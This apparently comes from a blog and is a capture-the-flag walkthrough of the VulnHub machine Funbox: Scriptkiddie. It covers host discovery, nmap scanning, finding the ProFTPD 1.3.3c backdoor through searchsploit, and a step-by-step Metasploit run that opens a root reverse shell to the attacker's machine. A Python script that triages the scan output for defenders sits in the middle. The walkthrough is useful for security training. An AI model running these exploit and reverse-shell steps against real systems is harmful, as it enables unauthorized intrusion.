Funbox
Identify the target host's IP address
Target machine: http://www.vulnhub.com/entry/funbox-scriptkiddie,725/
┌──(kali㉿kali)-[~/Vulnhub/Funbox]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.117.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.100 08:00:27:0f:0c:75 2 120 PCS Systemtechnik GmbH
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.134 08:00:27:79:a1:cf 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool built into Kali Linux, the target host's IP address is identified as 192.168.56.134.
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/Funbox]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.134 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-24 07:34 EDT
Nmap scan report for bogon (192.168.56.134)
Host is up (0.00024s latency).
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a6:0e:30:35:3b:ef:43:44:f5:1c:d7:c6:58:64:09:92 (RSA)
| 256 c2:d8:bd:62:bf:13:89:28:f8:61:e0:a6:c4:f7:a5:bf (ECDSA)
|_ 256 12:60:6e:58:ee:f2:bd:9c:ff:b0:35:05:83:08:71:b8 (ED25519)
25/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=funbox11
| Not valid before: 2021-07-19T16:52:14
|_Not valid after: 2031-07-17T16:52:14
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: funbox11, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Funbox: Scriptkiddie
|_http-generator: WordPress 5.7.2
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE SASL PIPELINING UIDL RESP-CODES TOP CAPA
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: IDLE LOGINDISABLEDA0001 more have capabilities ID listed SASL-IR LITERAL+ Pre-login post-login LOGIN-REFERRALS OK IMAP4rev1 ENABLE
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:79:A1:CF (Oracle VirtualBox virtual NIC)
Service Info: Hosts: funbox11, FUNBOX11; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -39m59s, deviation: 1h09m16s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-10-24T11:34:35
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: funbox11
| NetBIOS computer name: FUNBOX11\x00
| Domain name: \x00
| FQDN: funbox11
|_ System time: 2022-10-24T13:34:35+02:00
|_nbstat: NetBIOS name: FUNBOX11, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.94 seconds
Information gathering and vulnerability discovery
According to the NMAP scan results, the target host runs an FTP service, so the natural first step is to check whether anonymous access is allowed.
┌──(kali㉿kali)-[~/Vulnhub/Funbox]
└─$ ftp 192.168.56.134
Connected to 192.168.56.134.
220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [192.168.56.134]
Name (192.168.56.134:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
Anonymous access turns out not to be allowed, but from the banner and the NMAP results we know the FTP service is ProFTPD 1.3.3c, so let's check whether there are known vulnerabilities for it, especially high-severity ones.
$ searchsploit proftpd 1.3.3c
------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------- ---------------------------------
ProFTPd 1.3.3c - Compromised Source Backdo | linux/remote/15662.txt
ProFTPd-1.3.3c - Backdoor Command Executio | linux/remote/16921.rb
------------------------------------------- ---------------------------------
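The same triage can be scripted rather than eyeballed. This added example (not code from the original post) parses an excerpt of the nmap -oN report above, constructed inline, and flags the ProFTPD 1.3.3c banner that the searchsploit hits correspond to, plus two hardening points the same scan already shows: VRFY enabled on SMTP and SMB message signing disabled.

```python
import re

# Constructed excerpt of the nmap -oN report above (whitespace as the page shows it).
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
25/tcp open smtp Postfix smtpd
|_smtp-commands: funbox11, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Host script results:
| smb-security-mode:
|_ message_signing: disabled (dangerous, but default)
"""

# Banner substrings that the searchsploit step tied to a published exploit (EDB ids from that output).
BANNER_WATCHLIST = [
    ("ProFTPD 1.3.3c", "ftp: ProFTPD 1.3.3c is the backdoored source release (EDB 15662 / 16921)"),
]
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_nmap(text):
    """Return (services, host_scripts): each port line with the NSE lines under it,
    plus the host-level script lines that follow 'Host script results:'."""
    services, host_scripts, in_host = [], [], False
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, _proto, _state, service, banner = m.groups()
            services.append({"port": int(port), "service": service, "banner": banner.strip(), "scripts": []})
        elif line.startswith("Host script results:"):
            in_host = True
        elif line.startswith("|"):
            bucket = host_scripts if in_host or not services else services[-1]["scripts"]
            bucket.append(line.lstrip("|_ ").strip())
    return services, host_scripts

def triage(text):
    """Flag what a defender would fix first: known-bad banners, SMTP VRFY, SMB signing off."""
    services, host_scripts = parse_nmap(text)
    findings = []
    for svc in services:
        for needle, note in BANNER_WATCHLIST:
            if needle in svc["banner"]:
                findings.append((svc["port"], note))
        for script in svc["scripts"]:
            if script.startswith("smtp-commands:") and "VRFY" in script.split(", "):
                findings.append((svc["port"], "smtp: VRFY enabled, allows account enumeration"))
    if any(s.startswith("message_signing: disabled") for s in host_scripts):
        findings.append((445, "smb: message signing disabled (smb-security-mode)"))  # host-level script, SMB on 445
    return findings
```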
The result is positive, and since there is a module written in Ruby, Metasploit most likely has a corresponding module.
┌──(kali㉿kali)-[~/Vulnhub/Funbox]
└─$ msfconsole
=[ metasploit v6.2.9-dev ]
+ -- --=[ 2230 exploits - 1177 auxiliary - 398 post ]
+ -- --=[ 867 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Metasploit can be configured at startup, see
msfconsole --help to learn more
msf6 > search proftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/misc/netsupport_manager_agent 2011-01-08 average No NetSupport Manager Agent Remote Buffer Overflow
1 exploit/linux/ftp/proftp_sreplace 2006-11-26 great Yes ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
2 exploit/freebsd/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
3 exploit/linux/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
4 exploit/unix/ftp/proftpd_modcopy_exec 2015-04-22 excellent Yes ProFTPD 1.3.5 Mod_Copy Command Execution
5 exploit/unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent No ProFTPD-1.3.3c Backdoor Command Execution
Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/ftp/proftpd_133c_backdoor
msf6 > use exploit/unix/ftp/proftpd_133c_backdoor
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > show options
Module options (exploit/unix/ftp/proftpd_133c_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set RHOSTS 192.168.56.134
RHOSTS => 192.168.56.134
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > exploit
[-] 192.168.56.134:21 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
cmd/unix/
set payload cmd/unix/bind_perl
set payload cmd/unix/bind_perl_ipv6
set payload cmd/unix/generic
set payload cmd/unix/reverse
set payload cmd/unix/reverse_bash_telnet_ssl
set payload cmd/unix/reverse_perl
set payload cmd/unix/reverse_perl_ssl
set payload cmd/unix/reverse_ssl_double_telnet
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/
set payload cmd/unix/bind_perl
set payload cmd/unix/bind_perl_ipv6
set payload cmd/unix/generic
set payload cmd/unix/reverse
set payload cmd/unix/reverse_bash_telnet_ssl
set payload cmd/unix/reverse_perl
set payload cmd/unix/reverse_perl_ssl
set payload cmd/unix/reverse_ssl_double_telnet
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > show options
Module options (exploit/unix/ftp/proftpd_133c_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.56.134 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > exploit
[*] Started reverse TCP double handler on 192.168.56.101:5555
[*] 192.168.56.134:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo iINNRrLEUMN9Wbdm;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "iINNRrLEUMN9Wbdm\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.56.101:5555 -> 192.168.56.134:43318) at 2022-10-24 07:42:38 -0400
id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
which python
/usr/bin/python
python -c import 'pty;pty.spawn("/bin/bash")'
File "<string>", line 1
import
^
SyntaxError: invalid syntax
python -c 'import pty;pty.spawn("/bin/bash")'
root@funbox11:/# ls -alh
ls -alh
total 96K
drwxr-xr-x 23 root root 4.0K Jul 19 2021 .
drwxr-xr-x 23 root root 4.0K Jul 19 2021 ..
drwxr-xr-x 2 root root 4.0K Jul 19 2021 bin
drwxr-xr-x 3 root root 4.0K Jul 19 2021 boot
drwxr-xr-x 18 root root 3.8K Oct 24 13:30 dev
drwxr-xr-x 100 root root 4.0K Jul 19 2021 etc
drwxr-xr-x 3 root root 4.0K Jul 19 2021 home
lrwxrwxrwx 1 root root 33 Jul 19 2021 initrd.img -> boot/initrd.img-4.4.0-210-generic
lrwxrwxrwx 1 root root 33 Jul 19 2021 initrd.img.old -> boot/initrd.img-4.4.0-186-generic
drwxr-xr-x 22 root root 4.0K Jul 19 2021 lib
drwxr-xr-x 2 root root 4.0K Jul 19 2021 lib64
drwx------ 2 root root 16K Jul 19 2021 lost+found
drwxr-xr-x 3 root root 4.0K Jul 19 2021 media
drwxr-xr-x 2 root root 4.0K Aug 10 2020 mnt
drwxr-xr-x 2 root root 4.0K Aug 10 2020 opt
dr-xr-xr-x 130 root root 0 Oct 24 13:30 proc
drwx------ 4 root root 4.0K Jul 20 2021 root
drwxr-xr-x 26 root root 920 Oct 24 13:30 run
drwxr-xr-x 2 root root 12K Jul 19 2021 sbin
drwxr-xr-x 2 root root 4.0K Jul 19 2021 snap
drwxr-xr-x 2 root root 4.0K Aug 10 2020 srv
dr-xr-xr-x 13 root root 0 Oct 24 13:30 sys
drwxrwxrwt 9 root root 4.0K Oct 24 13:39 tmp
drwxr-xr-x 10 root root 4.0K Jul 19 2021 usr
drwxr-xr-x 14 root root 4.0K Jul 19 2021 var
lrwxrwxrwx 1 root root 30 Jul 19 2021 vmlinuz -> boot/vmlinuz-4.4.0-210-generic
lrwxrwxrwx 1 root root 30 Jul 19 2021 vmlinuz.old -> boot/vmlinuz-4.4.0-186-generic
root@funbox11:/# cd /root
cd /root
root@funbox11:/root# ls -alh
ls -alh
total 48K
drwx------ 4 root root 4.0K Jul 20 2021 .
drwxr-xr-x 23 root root 4.0K Jul 19 2021 ..
-rw------- 1 root root 5 Jul 20 2021 .bash_history
-rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
drwx------ 2 root root 4.0K Jul 19 2021 .cache
-rw------- 1 root root 149 Jul 20 2021 .mysql_history
drwxr-xr-x 2 root root 4.0K Jul 19 2021 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 2.3K Jul 20 2021 root.txt
-rw------- 1 root root 4.6K Jul 20 2021 .viminfo
-rw-r--r-- 1 root root 167 Oct 24 13:30 .wget-hsts
root@funbox11:/root# cat root.txt
cat root.txt
$$$$$$$$\ $$\
$$ _____| $$ |
$$ | $$\ $$\ $$$$$$$\ $$$$$$$\ $$$$$$\ $$\ $$\ $$\
$$$$$\ $$ | $$ |$$ __$$\ $$ __$$\ $$ __$$\ \$$\ $$ |\__|
$$ __|$$ | $$ |$$ | $$ |$$ | $$ |$$ / $$ | \$$$$ /
$$ | $$ | $$ |$$ | $$ |$$ | $$ |$$ | $$ | $$ $$< $$\
$$ | \$$$$$$ |$$ | $$ |$$$$$$$ |\$$$$$$ |$$ /\$$\ \__|
\__| \______/ \__| \__|\_______/ \______/ \__/ \__|
$$$$$$\ $$\ $$\ $$\ $$\ $$\ $$\ $$\
$$ __$$\ \__| $$ | $$ | \__| $$ | $$ |\__|
$$ / \__| $$$$$$$\ $$$$$$\ $$\ $$$$$$\ $$$$$$\ $$ | $$\ $$\ $$$$$$$ | $$$$$$$ |$$\ $$$$$$\
\$$$$$$\ $$ _____|$$ __$$\ $$ |$$ __$$\\_$$ _| $$ | $$ |$$ |$$ __$$ |$$ __$$ |$$ |$$ __$$\
\____$$\ $$ / $$ | \__|$$ |$$ / $$ | $$ | $$$$$$ / $$ |$$ / $$ |$$ / $$ |$$ |$$$$$$$$ |
$$\ $$ |$$ | $$ | $$ |$$ | $$ | $$ |$$\ $$ _$$< $$ |$$ | $$ |$$ | $$ |$$ |$$ ____|
\$$$$$$ |\$$$$$$$\ $$ | $$ |$$$$$$$ | \$$$$ |$$ | \$$\ $$ |\$$$$$$$ |\$$$$$$$ |$$ |\$$$$$$$\
\______/ \_______|\__| \__|$$ ____/ \____/ \__| \__|\__| \_______| \_______|\__| \_______|
$$ |
$$ |
\__|
Please, tweet this to: @0815R2d2
Thank you...
root@funbox11:/root#
Root obtained very easily!!!
Tags: Funbox, unix, Vulnhub, root. From: https://www.cnblogs.com/jason-huawen/p/16823185.html